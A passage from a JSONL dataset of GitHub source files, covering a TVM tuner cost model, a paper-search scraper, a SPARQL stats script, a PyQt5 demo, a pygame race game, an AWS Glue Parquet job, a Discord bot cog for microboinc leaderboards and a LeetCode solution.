config.get_flatten_feature()[:20]\n knob_zeros = np.zeros(20)\n knob_zeros[-len(knobs) :] = knobs\n parameter = np.hstack(\n [\n list(map(lambda x: x.value, args[1].shape)),\n list(map(lambda x: x.value, args[2].shape)),\n ]\n )\n parameter_zeros = np.zeros(8)\n parameter_zeros[-len(parameter) :] = parameter\n return np.hstack([curve_zeros, knob_zeros, parameter_zeros])\n except Exception as e:\n import traceback\n import sys\n\n traceback.print_exc()\n print(\"Error on line {}\".format(sys.exc_info()[-1].tb_lineno), type(e).__name__, e)\n return None\n","repo_name":"ryujaehun/one-shot-tuner","sub_path":"python/tvm/autotvm/tuner/oneshot_cost_model.py","file_name":"oneshot_cost_model.py","file_ext":"py","file_size_in_byte":6031,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"68"} +{"seq_id":"32509655205","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Sep 2 19:58:49 2021\r\n\r\n@author: xyyx\r\n\"\"\"\r\nimport os\r\nimport requests as req\r\nimport re\r\nimport time\r\n\r\npath = r\"D:\\tempro\\TeacherXu\"\r\nos.chdir(path)\r\n\r\nSearchKey = \"CSR\"\r\nurl = \"https://econpapers.repec.org/scripts/search.pf?ft={};pg=1\".format(SearchKey)\r\nheaders = {\r\n \"User-Agent\": \"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Mobile Safari/537.36\"\r\n }\r\n\r\nurl1 = \"https://econpapers.repec.org/scripts/search.pf?ft=哈哈\"\r\nres = req.get(url,headers = headers,timeout = 5)\r\nres.content.decode()\r\nprint(res.content)\r\ndef get_urls(SearchKey):\r\n # 判断搜索结果是否为空\r\n url = \"https://econpapers.repec.org/scripts/search.pf?ft=CSR\"\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Mobile Safari/537.36\"\r\n }\r\n LinkFlag = True\r\n while LinkFlag:\r\n try:\r\n res = req.get(url,headers = headers,timeout = 3)\r\n if res.status_code == 200:\r\n LinkFlag=False\r\n except:\r\n print(\"连接失败,重新连接。\")\r\n time.sleep(10)\r\n \r\n if \"No matching documents when searching for\" in res.content.decode():\r\n print(\"搜索结果为空,请更换SearchKey。\")\r\n # return 0\r\n else:\r\n str = res.content.decode() #要decode()才能使用re\r\n pattern1 = re.compile(r'(?<=page\\s1\\sof\\s)(\\d*)')\r\n TotalPage = re.search(pattern1,str).group() # 总页数无法使用xpath定位,使用正则\r\n url = \"https://econpapers.repec.org/scripts/search.pf?ft={};pg=1\".format(SearchKey)\r\n \r\n \r\n \r\n\r\n \r\n","repo_name":"xyyx0212/SearchPDF","sub_path":"EcoPaper.py","file_name":"EcoPaper.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"36585077775","text":"from SPARQLWrapper import SPARQLWrapper, JSON\nfrom urllib2 import URLError\nimport os, sys, json, time\n\nclasses = [\"triples\",\"labels\"]\nbases = [\"aaa\",\"acm\",\"autry\",\"cbm\",\"ccma\",\"dma\",\"GM\",\"ima\",\"nmwa\",\"npg\",\"puam\",\"saam\",\"wam\",\"YCBA\"]\n\nconstituents = [\"E21_Person\",\"E39_Actor\",\"E40_Legal_Body\",\"E74_Group\"]\nobjects = [\"E22_Man-Made_Object\",\"E84_Information_Carrier\"]\nevents = [\"E5_Event\",\"E6_Destruction\",\"E7_Activity\",\"E8_Acquisition\",\"E9_Move\",\"E10_Transfer_of_Custody\",\n \"E11_Modification\",\"E12_Production\",\"E13_Attribute_Assignment\",\"E14_Condition_Assessment\",\n \"E15_Identifier_Assignment\",\"E16_Measurement\",\"E17_Type_Assignment\",\"E79_Part_Addition\",\n \"E80_Part_Removal\",\"E63_Beginning_of_Existence\",\"E64_End_of_Existence\",\"E65_Creation\",\n \"E66_Formation\",\"E67_Birth\",\"E68_Dissolution\",\"E69_Death\",\"E81_Transformation\",\"E83_Type_Creation\",\n \"E85_Joining\",\"E86_Leaving\",\"E87_Curation_Activity\"]\nplaces = [\"E53_Place\"]\n\n# All classes\nall_classes = []\nall_classes = classes + all_classes + constituents + objects + events + places\n\nout = {\"total\":{}}\nf_in = open(\"overallStats.sparql\", 'r')\nbase_query = f_in.read()\nf_in.close()\n\nfor b in bases:\n print (\"Base is \"+b)\n graph_query = base_query.replace(\"\",b)\n sparql = SPARQLWrapper(\"http://data.americanartcollaborative.org/sparql\")\n out_c = {\"constituents\":0,\"objects\":0,\"events\":0,\"places\":0}\n \n for c in all_classes:\n if c == \"triples\":\n query = graph_query.replace(\"?s a crm:\",\"?s ?o ?p\")\n elif c == \"labels\":\n query = graph_query.replace(\"?s a crm:;\",\"?s a crm:E39_Actor;\\n skos:exactMatch ?lod.\")\n else:\n query = graph_query.replace(\"\",c)\n\n #print (query)\n\n sparql.setQuery(query)\n sparql.setReturnFormat(JSON)\n sparql.setTimeout(360)\n while True:\n try:\n results = sparql.query().convert()\n break\n except URLError:\n print(\"Connection to Sparql server failed! Trying again in five seconds!\")\n time.sleep(5)\n\n if c in constituents:\n out_c[\"constituents\"] += int(results[\"results\"][\"bindings\"][0][\"c\"][\"value\"])\n elif c in objects:\n out_c[\"objects\"] += int(results[\"results\"][\"bindings\"][0][\"c\"][\"value\"])\n elif c in events:\n out_c[\"events\"] += int(results[\"results\"][\"bindings\"][0][\"c\"][\"value\"])\n elif c in places:\n out_c[\"places\"] += int(results[\"results\"][\"bindings\"][0][\"c\"][\"value\"])\n else:\n out_c[c] = int(results[\"results\"][\"bindings\"][0][\"c\"][\"value\"])\n\n out[b] = out_c\n print (json.dumps(out_c, indent=4, sort_keys=True))\n \n for key in out_c:\n if key in out[\"total\"]:\n out[\"total\"][key] += out_c[key]\n else:\n out[\"total\"][key] = out_c[key]\n\nprint (\"\\nTotal \\n\")\nprint (json.dumps(out[\"total\"], indent=4, sort_keys=True))","repo_name":"american-art/linking","sub_path":"linkage/overallStats.py","file_name":"overallStats.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"6193005918","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\r\n################################################################################\r\n#\r\n# 24.5 多文档界面QMdiArea\r\n#\r\n################################################################################\r\nfrom cgitb import text\r\nimport sys\r\nfrom PyQt5.QtGui import QIcon\r\nfrom PyQt5.QtWidgets import (\r\n QApplication, QWidget, QMainWindow, QMdiArea, QAction, QMdiSubWindow,\r\n QTextEdit\r\n)\r\n\r\n################################################################################\r\nclass Demo(QMainWindow):\r\n def __init__(self) -> None:\r\n super().__init__()\r\n\r\n self.mdi_area = QMdiArea(self)\r\n self.setCentralWidget(self.mdi_area)\r\n\r\n self.toolbar = self.addToolBar('Tool Bar')\r\n\r\n self.new_action = QAction('New', self)\r\n self.close_action = QAction('Close', self)\r\n self.close_all_action = QAction('Close All', self)\r\n self.mode1_action = QAction('Cascade', self)\r\n self.mode2_action = QAction('Tile', self)\r\n\r\n self.new_action.triggered.connect(self.new_func)\r\n self.close_action.triggered.connect(self.mdi_area.closeActiveSubWindow)\r\n self.close_all_action.triggered.connect(self.mdi_area.closeAllSubWindows)\r\n self.mode1_action.triggered.connect(self.mdi_area.cascadeSubWindows)\r\n self.mode2_action.triggered.connect(self.mdi_area.tileSubWindows)\r\n\r\n self.toolbar.addAction(self.new_action)\r\n self.toolbar.addAction(self.close_action)\r\n self.toolbar.addAction(self.close_all_action)\r\n self.toolbar.addAction(self.mode1_action)\r\n self.toolbar.addAction(self.mode2_action)\r\n\r\n def new_func(self):\r\n print('new_func')\r\n text = QTextEdit()\r\n sub = QMdiSubWindow()\r\n sub.setWidget(text)\r\n self.mdi_area.addSubWindow(sub)\r\n sub.show()\r\n\r\n################################################################################\r\nif __name__ == \"__main__\":\r\n app = QApplication(sys.argv)\r\n demo = Demo()\r\n demo.show()\r\n sys.exit(app.exec_())\r\n","repo_name":"iaiting/StudyDemo","sub_path":"PyDemo/快速掌握PyQt5/第2篇/chap24_装入更多控件-3/chap24_005.py","file_name":"chap24_005.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27319278558","text":"import pygame\r\nfrom pygame import mixer\r\nimport time\r\nimport math\r\npygame.init()\r\n\r\nscreen = pygame.display.set_mode((600, 400))\r\npygame.display.set_caption(\"Turtle Race\")\r\nicon = pygame.image.load(\"animal.png\")\r\npygame.display.set_icon(icon)\r\n# Player 1\r\nPlayer = pygame.image.load(\"animal.png\")\r\nplayerX = 550\r\nplayerY = 300\r\n# Player 2\r\nPlayer2 = pygame.image.load(\"turtle.png\")\r\nPlayer2X = 550\r\nPlayer2Y = 175\r\n\r\n# Flag\r\nFlag = pygame.image.load(\"Finish.png\")\r\nFlagX = 0\r\nFlagY = 50\r\n# Title\r\nTitle = pygame.image.load(\"Titles.png\")\r\nTitleX = 150\r\nTitleY = 50\r\n# Winning\r\nWin = pygame.image.load(\"Win.png\")\r\nWinX = -100\r\nWinY = -100\r\nWin2 = pygame.image.load(\"Win2.png\")\r\nWin2X = -100\r\nWin2Y = -100\r\n# Hint\r\nHint = pygame.image.load(\"Hintss.png\")\r\nHintX = -500\r\nHintY = -500\r\n# Flower\r\nFlower = pygame.image.load(\"Flower.png\")\r\nFlowerX = 250\r\nFlowerY = 0\r\n# Rock\r\nRock = pygame.image.load(\"Rock.png\")\r\nRockX = -500000\r\nRockY = -5000000\r\nRock_change = 0.1\r\n# Cube\r\nCubey = pygame.image.load(\"C.png\")\r\n# Butterfly\r\nButterfly = pygame.image.load(\"Butterfly.png\")\r\n\r\n\r\n\r\ndef Sounds():\r\n Sound = mixer.Sound(\"Jump.wav\")\r\n Sound.play()\r\n\r\n\r\n#Level\r\nB = 255\r\nG = 0\r\nR = 0\r\na = True\r\nb = 1\r\nc = 2\r\n\r\nmixer.music.load(\"AA.wav\")\r\nmixer.music.play(-1)\r\n\r\ndef player():\r\n screen.blit(Player,(playerX, playerY))\r\n\r\n\r\ndef player2():\r\n screen.blit(Player2, (Player2X, Player2Y))\r\n\r\n\r\ndef flag():\r\n screen.blit(Flag, (FlagX, FlagY))\r\n\r\ndef title():\r\n screen.blit(Title, (TitleX, TitleY))\r\n\r\ndef win():\r\n screen.blit(Win , (WinX, WinY))\r\n\r\ndef win2():\r\n screen.blit(Win2 , (Win2X, Win2Y))\r\n\r\ndef hint():\r\n screen.blit(Hint , (HintX, HintY))\r\n\r\ndef flower(X, Y):\r\n screen.blit(Flower, (X, Y))\r\n\r\ndef Cube(X, Y):\r\n screen.blit(Cubey , (X, Y))\r\n\r\ndef Butterflies(X, Y):\r\n screen.blit(Butterfly , (X, Y))\r\n\r\ndef rock():\r\n screen.blit(Rock , (RockX, RockY))\r\n\r\ndef collision():\r\n distance = math.sqrt(math.pow(playerX-FlowerX,2) + math.pow(playerY-FlowerY,2))\r\n if distance < 27:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\ndef collision2():\r\n distance = math.sqrt(math.pow(Player2X-RockX,2) + math.pow(Player2Y-RockY,2))\r\n if distance < 27:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n\r\nrunning = True\r\n\r\nwhile running:\r\n\r\n\r\n\r\n\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_LEFT and a == True:\r\n playerX -= 3\r\n Sounds()\r\n TitleY = -1000\r\n print(FlowerY)\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_ESCAPE:\r\n print(\"Key Pressed Escape\")\r\n pygame.quit()\r\n\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_a and a == True:\r\n Player2X -= 3\r\n Sounds()\r\n TitleY = -1000\r\n\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_SPACE and a == False:\r\n playerX = 550\r\n playerY = 300\r\n Player2X = 550\r\n Player2Y = 150\r\n WinY = -1000\r\n Win2Y = -1000\r\n HintY = -1000\r\n HintX = -1000\r\n RockX = 200\r\n RockY = 10\r\n RockY += Rock_change\r\n a = True\r\n b = 1\r\n c = 1\r\n B -= 125\r\n G += 125\r\n print(B)\r\n pygame.display.update()\r\n\r\n if B < 0 or G > 255 or R > 255:\r\n G = 255\r\n B = 0\r\n R += 255\r\n\r\n if R > 255:\r\n R = 255\r\n\r\n if playerX <= 10:\r\n a = False\r\n WinX = 150\r\n WinY = 10\r\n HintX = 150\r\n HintY = 100\r\n\r\n\r\n if Player2X <= 10:\r\n a = False\r\n Win2X = 150\r\n Win2Y = 10\r\n HintX = 150\r\n HintY = 100\r\n\r\n\r\n if b == 1 and a == False:\r\n sound = mixer.Sound(\"Finish.wav\")\r\n sound.play()\r\n b = 2\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n screen.fill((R, G, B))\r\n\r\n if RockY < 800:\r\n RockY = 15\r\n\r\n\r\n\r\n RockY += Rock_change\r\n\r\n\r\n\r\n player()\r\n player2()\r\n flag()\r\n title()\r\n win()\r\n win2()\r\n hint()\r\n flower(FlowerX, FlowerY)\r\n flower(200, 0)\r\n flower(150, 0)\r\n flower(100, 0)\r\n flower(50, 0)\r\n flower(0, 0)\r\n flower(300, 0)\r\n flower(350, 0)\r\n flower(400, 0)\r\n flower(450, 0)\r\n flower(500, 0)\r\n flower(550, 0)\r\n flower(200, 338)\r\n flower(150, 338)\r\n flower(100, 338)\r\n flower(50, 338)\r\n flower(0, 338)\r\n flower(300, 338)\r\n flower(350, 338)\r\n flower(400, 338)\r\n flower(450, 338)\r\n flower(500, 338)\r\n flower(550, 338)\r\n flower(250, 338)\r\n Butterflies(550, 325)\r\n pygame.display.update()\r\n","repo_name":"Nature-Studioz/Turtle-Game","sub_path":"Code.py","file_name":"Code.py","file_ext":"py","file_size_in_byte":4926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"17997992902","text":"#libraries\nimport boto3\nimport sys\nfrom datetime import date, timedelta, datetime\nfrom dateutil.relativedelta import *\nfrom pyspark.context import SparkContext\nfrom awsglue.context import GlueContext\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql import functions as f\nfrom awsglue.job import Job\nfrom awsglue.transforms import *\nfrom awsglue.utils import getResolvedOptions\n\nimport pandas as pd\n\nclass argsGet():\n @property\n def loaded_args(self):\n return self._loaded_args\n\n def __init__(self, arg_vars=list) -> None:\n self.args = arg_vars\n self._loaded_args= self.load_args()\n pass\n\n def load_args(self):\n args = getResolvedOptions(sys.argv, self.args)\n return args\n \n\nclass CsvToParquet():\n def __init__(self, args) -> None:\n self.args = args \n #Init Spark Context\n self.sc = SparkContext()\n self.glueContext = GlueContext(self.sc)\n self.logger = self.glueContext.get_logger()\n self.spark = self.glueContext.spark_session\n self.spark.conf.set(\"spark.sql.sources.partitionOverwriteMode\",\"dynamic\") #to overwrite partitions\n self.job = Job(self.glueContext)\n #Start Spark Job\n self.job.init(self.args['JOB_NAME'], self.args)\n \n\n def read_data(self):\n self.logger.info(\"reading csv file into sparkDF\")\n source_uri = self.args['source_uri'] \n sparkDF = self.spark.read.options(header='True', inferSchema='True', delimiter=',').csv(source_uri)\n sparkDF.printSchema()\n return sparkDF\n\n def save_parquet(self, sparkDF): \n self.logger.info(\"Repartition and save as parquet\")\n output_uri = self.args['output_uri']\n sparkDF= sparkDF.withColumn(\"loan_date\", f.from_unixtime(f.unix_timestamp(sparkDF.loan_date), \"yyyy-MM-dd\")) \n sparkDF = sparkDF.repartition('loan_date') \n sparkDF.write.mode('overwrite').format('parquet').partitionBy('loan_date').save(output_uri) \n\n def main(self):\n sparkDF = self.read_data() \n self.save_parquet(sparkDF)\n \n self.job.commit()\n\nif __name__ == \"__main__\": \n my_args = ['JOB_NAME',\n 'source_uri',\n 'output_uri'] \n parser = argsGet(my_args)\n args = parser.loaded_args\n\n csv_to_parquet = CsvToParquet(args)\n csv_to_parquet.main()","repo_name":"jagimene/mlops-datapipeline-modeltraining","sub_path":"glue/fe_to_parquet.py","file_name":"fe_to_parquet.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38980148796","text":"import discord\nfrom time import time\nfrom discord.ext import commands\nfrom discord_slash import cog_ext, SlashContext\nfrom discord_slash.utils.manage_commands import create_option, create_choice\n\nfrom config import config\nfrom main import notauthorized\nfrom utils import stats, leaderboard, microboincapi\nfrom config.config import rootdir, apikeyselfcreationisallowed\n\n\nclass Microboinc(commands.Cog):\n def __init__(self, bot: commands.Bot):\n self.bot = bot\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_createapikey, base=\"microboinc\", name=\"createapikey\", options=[\n create_option(\n name=\"nickname\",\n description=\"The nickname for microboinc!\",\n option_type=3,\n required=True\n ),\n create_option(\n name=\"user\",\n description=\"Only needed if you want to create an API-Key for some one else!\",\n option_type=6,\n required=False\n )\n ])\n async def _microboinc_createapikay(self, ctx: SlashContext, nickname: str, user: discord.Member = None):\n apifor = ctx.author\n if (user is None or user == ctx.author) and not apikeyselfcreationisallowed:\n await ctx.send(\"This feature is currently disabled!\")\n return\n\n if user is not None and user != ctx.author:\n await ctx.send(\"Not implementet yet!\")\n return\n if not microboincapi.isapilevelbyid(ctx.author_id, 2):\n await notauthorized(ctx)\n return\n apifor = user\n\n success, res = microboincapi.register(nickname, apifor.id)\n if not success:\n await ctx.send(res)\n return\n\n apikey = res\n try:\n await apifor.send(content=f\"Microboinc account created:\\nNickname: {nickname}\\nAPI-Key: {apikey}\")\n await ctx.send(content=f\"API-Key for {nickname}({apifor.mention}) created and send to their DMs.\")\n except discord.Forbidden:\n await ctx.send(hidden=True, content=f\"!Couldn't send API-Key to DMS!\\n\"\n f\"!THIS MESSAGE IS ONLY VISIBLE TO YOU!\\n\"\n f\"Microboinc account created for {apifor.mention}:\\n\"\n f\"Nickname: {nickname}\\n\"\n f\"API-Key: {apikey}\")\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_regenapikey, base=\"microboinc\", name=\"regenapikey\", options=[\n create_option(\n name=\"user\",\n description=\"Only needed if you want to regen an API-Key for some one else!\",\n option_type=6,\n required=False\n )\n ])\n async def _microboinc_regenapikey(self, ctx: SlashContext, user: discord.Member = None):\n await ctx.send(\"not available yet\")\n return;\n apifor = ctx.author\n if user is not None and user != ctx.author:\n if not microboincapiold.isapilevelbyid(ctx.author_id, 4):\n await notauthorized(ctx)\n return\n apifor = user\n\n success, res = microboincapiold.regen(apifor.id)\n if not success:\n await ctx.send(\"Something went wrong:\\n\" + res)\n return\n\n apikey = res\n try:\n await apifor.send(content=f\"Microboinc API-Key regened:\\nAPI-Key: {apikey}\")\n await ctx.send(content=f\"API-Key regened and send to their DMs.\")\n except discord.Forbidden:\n await ctx.send(hidden=True, content=f\"!Couldn't send API-Key to DMS!\\n\"\n f\"!THIS MESSAGE IS ONLY VISIBLE TO YOU!\\n\"\n f\"Microboinc account created for {apifor.mention}:\\n\"\n f\"API-Key: {apikey}\")\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_deletebyid, base=\"microboinc\", name=\"deletebyid\", options=[\n create_option(\n name=\"user\",\n description=\"The User you want to delete.\",\n option_type=6,\n required=True\n )\n ])\n async def _microboinc_deletebyid(self, ctx: SlashContext, user: discord.Member):\n await ctx.send(\"not available yet\")\n return\n if not microboincapiold.isapilevelbyid(ctx.author_id, 3):\n await notauthorized(ctx)\n return\n\n success, res = microboincapiold.deletebyid(user.id)\n\n if not success:\n await ctx.send(\"Something went wrong:\\n\" + res)\n return\n\n await ctx.send(content=f\"User({user.mention}) has been deleted.\")\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_results, base=\"microboinc\", name=\"results\", options=[\n create_option(\n name=\"appid\",\n description=\"The appid form microboinc.\",\n option_type=3,\n required=True\n )\n ])\n async def _microboinc_results(self, ctx: SlashContext, appid: int):\n\n #if not microboincapiold.isapilevelbyid(ctx.author_id, 1):\n # await notauthorized(ctx)\n # return\n\n m = await ctx.send(\"fetching data please wait a moment.\")\n foname = f'{int(time())}_results{appid}.txt'\n fname = f'{rootdir}/results/{int(time())}_results{appid}.txt'\n suc, res = microboincapi.getresultsbyappid(appid)\n if not suc:\n await m.edit(content=f\"Something went wrong: {res}\")\n return\n with open(fname, \"w\") as f:\n f.write(res)\n\n await m.edit(content=f\"Here are the results for app: {appid}\\nhttps://results.microboinc.com/{foname}\")\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_leaderboard, base=\"microboinc\", name=\"leaderboard\", options=[\n create_option(\n name=\"projectid\",\n description=\"The ID from the project you want the leaderboard from!\",\n option_type=4,\n required=True\n ), create_option(\n name=\"type\",\n description=\"The type of chart you want!\",\n option_type=3,\n required=False,\n choices=[\n create_choice(\n name=\"Graph\",\n value=\"1\"\n ),\n create_choice(\n name=\"Pie\",\n value=\"2\"\n )\n ]\n )\n ])\n async def _microboinc_leaderboard(self, ctx: SlashContext, projectid: int, type: str = \"1\"):\n fname = f'{rootdir}/leaderboards/{int(time())}_leaderboard-{projectid}.png'\n\n if type == \"1\":\n success, res = microboincapi.getleaderboardbyid(projectid)\n\n if not success:\n await ctx.send(res)\n return\n\n if not res[\"entries\"]:\n await ctx.send(\"There is not data yet!\")\n return\n\n leaderboard.graph(fname, projectid, res)\n\n elif type == \"2\":\n success, res = microboincapi.getleaderboardbyid(projectid)\n\n if not success:\n await ctx.send(res)\n return\n\n if not res[\"entries\"]:\n await ctx.send(\"There is not data yet!\")\n return\n\n leaderboard.pie(fname, projectid, res)\n\n await ctx.send(content=f\"The current Leaderboard for Project: {projectid}\", files=[discord.File(fname)])\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_userleaderboard, base=\"microboinc\", name=\"userleaderboard\", options=[\n create_option(\n name=\"projectid\",\n description=\"The ID from the project you want the leaderboard from!\",\n option_type=4,\n required=True\n ), create_option(\n name=\"user\",\n description=\"The User you want the stats for.\",\n option_type=6,\n required=True\n ), create_option(\n name=\"type\",\n description=\"The type of chart you want!\",\n option_type=3,\n required=False,\n choices=[\n create_choice(\n name=\"Graph\",\n value=\"1\"\n ),\n create_choice(\n name=\"Pie\",\n value=\"2\"\n )\n ]\n )\n ])\n async def _microboinc_userleaderboard(self, ctx: SlashContext, projectid: int, user: discord.User, type: str = \"1\"):\n fname = f'{rootdir}/leaderboards/{int(time())}_userleaderboard-{projectid}.png'\n if type == \"1\":\n success, res = microboincapi.getleaderboardbyidforuser(projectid, user.id)\n\n if not success:\n await ctx.send(res)\n return\n\n if not res[\"entries\"]:\n await ctx.send(\"There is not data yet!\")\n return\n\n leaderboard.graph(fname, projectid, res)\n\n elif type == \"2\":\n success, res = microboincapi.getleaderboardbyidforuser(projectid, user.id)\n\n if not success:\n await ctx.send(res)\n return\n\n if not res[\"entries\"]:\n await ctx.send(\"There is not data yet!\")\n return\n\n leaderboard.pie(fname, projectid, res)\n await ctx.send(content=f\"The current Leaderboard from {user.mention} for Project: {projectid}\", files=[discord.File(fname)])\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_progress, base=\"microboinc\", name=\"progress\", options=[\n create_option(\n name=\"projectid\",\n description=\"The ID from the project you want the progress for.\",\n option_type=4,\n required=True\n )\n ])\n async def _microboinc_progress(self, ctx: SlashContext, projectid: int):\n success, res = microboincapi.getprogressbyappid(projectid)\n\n if not success:\n await ctx.send(\"Something went wrong:\\n\" + res)\n return\n\n await ctx.send(content=f\"The progress of the Project: {res['name']}\\n\"\n f\"{res['totalDone']} / {res['totalGenerated']} ({(res['totalDone'] / res['totalGenerated'] * 100) if res['totalGenerated'] != 0 else 0}%)\")\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_stats_multipoints, base=\"microboinc\", name=\"stats-multipoints\",\n options=[\n create_option(\n name=\"projectid\",\n description=\"The ID of the project you want the stats for.\",\n option_type=4,\n required=True\n )\n ])\n async def _microboinc_stats_multipoints(self, ctx: SlashContext, projectid: int):\n fname = f'{rootdir}/stats/{int(time())}_stats-multipoints-{projectid}.png'\n m = await ctx.send(\"Please wait a moment, it can take a while to generate the Image.\")\n success, res = microboincapi.gethistleaderboardbyid(projectid)\n\n if not success:\n await m.edit(content=res)\n return\n\n if not res[\"entries\"]:\n await m.edit(content=\"There is not data yet!\")\n return\n\n stats.multipoints(fname, projectid, res)\n await m.edit(content=f\"Total points stats for Project: {projectid}\", files=[discord.File(fname)])\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_stats_singlepoints, base=\"microboinc\", name=\"stats-singlepoints\",\n options=[\n create_option(\n name=\"projectid\",\n description=\"The ID of the project you want the stats for.\",\n option_type=4,\n required=True\n ), create_option(\n name=\"user\",\n description=\"The User you want the stats for.\",\n option_type=6,\n required=True\n )\n ])\n async def _microboinc_stats_singlepoints(self, ctx: SlashContext, projectid: int, user: discord.User):\n m = await ctx.send(\"Please wait a moment, it can take a while to generate the Image.\")\n userid = user.id\n\n fname = f'{rootdir}/stats/{int(time())}_stats-singlepoints-{projectid}-{userid}.png'\n\n success, res = microboincapi.gethistleaderboardbyid(projectid)\n if not success:\n await m.edit(content=\"Something went wrong!\")\n return\n\n stats.singlepoints(fname, projectid, userid, res)\n await m.edit(content=f\"Single points stats from: {user.mention} Project: {projectid}\",\n files=[discord.File(fname)])\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_stats_totalpoints, base=\"microboinc\", name=\"stats-totalpoints\",\n options=[\n create_option(\n name=\"projectid\",\n description=\"The ID of the project you want the stats for.\",\n option_type=4,\n required=True\n )\n ])\n async def _microboinc_stats_totalpoints(self, ctx: SlashContext, projectid: int):\n fname = f'{rootdir}/stats/{int(time())}_stats-totalpoints-{projectid}.png'\n m = await ctx.send(\"Please wait a moment, it can take up to a minute to generate the Image.\")\n success, res = microboincapi.gethistleaderboardbyid(projectid)\n\n if not success:\n await m.edit(content=\"Something went wrong!\")\n return\n\n stats.totalpoints(fname, projectid, res)\n\n await m.edit(content=f\"Total points from Project: {projectid}\", files=[discord.File(fname)])\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_stats_totalhourlypoints, base=\"microboinc\",\n name=\"stats-totalhourlypoints\", options=[\n create_option(\n name=\"projectid\",\n description=\"The ID of the project you want the stats for.\",\n option_type=4,\n required=True\n )\n ])\n async def _microboinc_stats_totalhourlypoints(self, ctx: SlashContext, projectid: int):\n fname = f'{rootdir}/stats/{int(time())}_stats-totalhourlypoints-{projectid}.png'\n m = await ctx.send(\"Please wait a moment, it can take up to a minute to generate the Image.\")\n success, res = microboincapi.gethistleaderboardbyid(projectid)\n if success:\n stats.totalhourlypoints(fname, projectid, res)\n else:\n await m.edit(content=\"Something went wrong!\")\n return\n\n await m.edit(content=f\"Totalhourlypoins stats from Project: {projectid}\", files=[discord.File(fname)])\n\n @cog_ext.cog_subcommand(guild_ids=config.slash_mb_stats_singlehourlypoints, base=\"microboinc\",\n name=\"stats-singlehourlypoints\", options=[\n create_option(\n name=\"projectid\",\n description=\"The ID of the project you want the stats for.\",\n option_type=4,\n required=True\n ), create_option(\n name=\"user\",\n description=\"The User you want the stats for.\",\n option_type=6,\n required=True\n ), create_option(\n name=\"internaluseridoverride\",\n description=\"The internal ID from the user(overrides the discord user)\",\n option_type=4,\n required=False\n )\n ])\n async def _microboinc_stats_singlehourlypoints(self, ctx: SlashContext, projectid: int, user: discord.User,\n internaluseridoverride: int = None):\n await ctx.send(\"not available yet\")\n return;\n m = await ctx.send(\"Please wait a moment, it can take up to a minute to generate the Image.\")\n\n userid = internaluseridoverride\n username = f\"OVERRIDE-{userid}\"\n if internaluseridoverride is None:\n uisuc, uires = microboincapiold.getuserinfobyid(user.id)\n if not uisuc:\n await m.edit(content=f\"User not found: {user.name}({user.id})\")\n return\n userid = uires[\"User\"][\"ID\"]\n username = uires[\"User\"][\"Username\"]\n\n fname = f'{rootdir}/stats/{int(time())}_stats-singlehourlypoints-{projectid}-{userid}.png'\n\n success, res = microboincapiold.gethistleaderboardbyid(projectid)\n if success:\n stats.singlehourlypoints(fname, projectid, userid, username, res)\n else:\n await m.edit(content=\"Something went wrong!\")\n return\n\n await m.edit(content=f\"Singlehourlypoints stats from: {username} Project: {projectid}\",\n files=[discord.File(fname)])\n\n\ndef setup(bot):\n bot.add_cog(Microboinc(bot))\n","repo_name":"ItzN00bPvP/realN00bBot","sub_path":"cogs/microboinc.py","file_name":"microboinc.py","file_ext":"py","file_size_in_byte":17248,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"37682205092","text":"class Solution:\n def numberOfUniqueGoodSubsequences(self, binary: str) -> int:\n next_ = [None, None]\n nexts = [[] for _ in range(len(binary))]\n for idx in reversed(range(len(binary))):\n value = int(binary[idx])\n nexts[idx] = next_[::]\n next_[value] = idx\n \n \n @lru_cache(None)\n def dp(index):\n \n total = 1\n if nexts[index][1] is not None:\n total += dp(nexts[index][1])\n \n if nexts[index][0] is not None:\n total += dp(nexts[index][0])\n return total\n \n total = min(binary.count(\"0\"), 1)\n \n if next_[1] is not None:\n total += dp(next_[1])\n \n return total % (7 + 10 ** 9)\n \n \n \n 